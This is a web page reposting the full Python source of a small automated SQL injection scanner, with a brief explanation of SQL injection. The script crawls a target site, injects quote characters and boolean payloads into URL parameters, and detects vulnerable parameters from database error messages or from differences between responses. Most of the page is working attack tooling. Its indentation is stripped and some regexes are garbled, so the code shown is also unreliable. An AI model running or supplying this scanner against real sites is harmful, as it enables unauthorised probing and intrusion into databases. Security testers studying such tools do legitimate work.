Damn Small SQLi Scanner (DSSS) v0.1b - 100 Lines Python Code
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It happens from using Microsoft SQL or other poorly designed query language interpreters.
Source Code :
Source Code :
#!/usr/bin/env python
import difflib, httplib, optparse, random, re, sys, urllib2, urlparse
NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)"
VERSION = "0.1b"
AUTHOR = "Miroslav Stampar (https://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)"
NOTE = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)"
INVALID_SQL_CHAR_POOL = ['(',')','\'','"']
CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz")
SUFFIXES = ["", "-- ", "#"]
PREFIXES = [" ", ") ", "' ", "') "]
BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"]
DBMS_ERRORS = {}
DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."]
DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."]
DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."]
DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"]
DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"]
DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"]
DBMS_ERRORS["Informix"] = [r"Exception.*Informix"]
DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"]
DBMS_ERRORS["SQLite"] = [r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"]
DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"]
DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"]
DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"]
def getTextOnly(page):
retVal = re.sub(r"(?s)|||<[^>]+>|\s", " ", page)
retVal = re.sub(r"\s{2,}", " ", retVal)
return retVal
def retrieveContent(url):
retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content]
try:
retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read()
except Exception, e:
if hasattr(e, 'read'):
retVal[3] = e.read()
elif hasattr(e, 'msg'):
retVal[3] = e.msg
retVal[1] = e.code if hasattr(e, 'code') else None
match = re.search(r"(?P<title>[^<]+) ", retVal[3])
retVal[2] = match.group("title") if match else ""
retVal[0] = getTextOnly(retVal[3])
return retVal
def shallowCrawl(url):
retVal = set([url])
page = retrieveContent(url)[3]
for match in re.finditer(r"href\s*=\s*\"(?P[^\"]+)\"", page, re.I):
link = urlparse.urljoin(url, match.group("href"))
if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS:
if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])):
retVal.add(link)
return retVal
def scanPage(url):
for link in shallowCrawl(url):
print "* scanning: %s" % link
for match in re.finditer(r"(?:[?&;])((?P\w+)=[^&;]+)", link):
vulnerable = False
tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL))))
content = retrieveContent(tampered)
for dbms in DBMS_ERRORS:
for regex in DBMS_ERRORS[dbms]:
if not vulnerable and re.search(regex, content[0], re.I):
print " (o) parameter '%s' could be SQLi vulnerable! (%s error message)" % (match.group('parameter'), dbms)
vulnerable = True
if not vulnerable:
original = retrieveContent(link)
a, b = random.randint(100, 255), random.randint(100, 255)
for prefix in PREFIXES:
for boolean in BOOLEANS:
for suffix in SUFFIXES:
if not vulnerable:
template = "%s%s%s" % (prefix, boolean, suffix)
payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, b))))
contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])]
if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original) == len(contents[0][0]) != len(contents[1][0]):
vulnerable = True
else:
ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]])
vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95
if vulnerable:
print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0])
if __name__ == "__main__":
print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"https://www.target.com/page.htm?id=1\")")
options, _ = parser.parse_args()
if options.url:
scanPage(options.url)
else:
parser.print_help()
